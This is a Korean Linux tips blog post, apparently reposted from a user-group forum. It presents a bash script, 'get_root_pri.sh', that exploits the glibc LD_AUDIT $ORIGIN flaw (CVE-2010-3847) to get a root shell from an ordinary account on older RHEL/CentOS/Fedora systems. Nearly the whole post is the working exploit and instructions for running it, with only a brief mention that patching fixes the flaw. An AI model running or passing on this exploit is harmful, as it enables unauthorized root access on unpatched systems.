반응형
출처: http://cafe.daum.net/redhat/D4GV/17
아래의 스크립트를 실행하게 되면 일반계정으로 root계정의 권한을 획득하게 된다.
원격지에서 SSH등으로 일반계정으로 접속하여 아래와 같은 명령 집합으로 실행한다.
실행시 일반계정으로 접속후에 실행권한 755와 같은 x 권한을 주고 실행한다.
이는 취약성이고 이 취약성을 패치하려면 CVE-2010-3847 를 패치해야 한다.
>>적용되는 버젼
RHEL 5.x/CENT OS 5.x/FC 13에서 TEST됨 (glibc버젼에 연관)
get_root_pri.sh
[출처] 일반계정으로 root계정 획득하는 스크립트 (네이버 리눅스 유저 그룹) |작성자 오날도
#!/bin/bash
cd /tmp
echo "" > payload.c
echo "void __attribute__((constructor)) init()" >> payload.c
echo "{" >> payload.c
echo "setuid(0);" >> payload.c
echo " system(\"/bin/bash\");" >> payload.c
echo "}" >> payload.c
cat payload.c
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
ls -l /proc/$$/fd/3
ls -l /proc/$$/fd/3
rm -rf /tmp/exploit/
gcc -w -fPIC -shared -o /tmp/exploit payload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
whoami
[출처] 일반계정으로 root계정 획득하는 스크립트 (네이버 리눅스 유저 그룹) |작성자 오날도
반응형
'각종TIPs > LINUX' 카테고리의 다른 글
rsync error: error in socket IO (code 10) at clientserver.c(94) (0) | 2013.05.24 |
---|---|
MYSQL에 어느날 root 권한이 없다고 할 때 (0) | 2012.03.13 |
Got a packet bigger than 'max_allowed_packet' bytes (0) | 2011.10.04 |
CENTOS 설치메뉴얼 (0) | 2011.05.26 |
r8111드라이버 (0) | 2011.05.23 |